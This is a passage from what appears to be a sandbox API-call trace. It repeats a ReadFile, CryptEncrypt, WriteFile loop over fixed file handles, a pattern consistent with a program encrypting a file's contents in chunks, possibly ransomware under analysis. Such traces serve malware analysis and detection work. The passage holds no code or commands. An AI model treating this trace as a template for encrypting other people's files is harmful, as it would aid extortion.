hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.951] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.952] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.953] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.954] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.955] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.955] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.955] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.955] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.955] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.955] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.955] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.955] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.956] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.956] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.956] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.956] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.956] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.956] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.957] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.957] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.957] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.957] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.957] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.957] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.958] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.958] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.958] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.958] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.958] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.958] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.959] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.959] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.959] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.959] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.959] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, 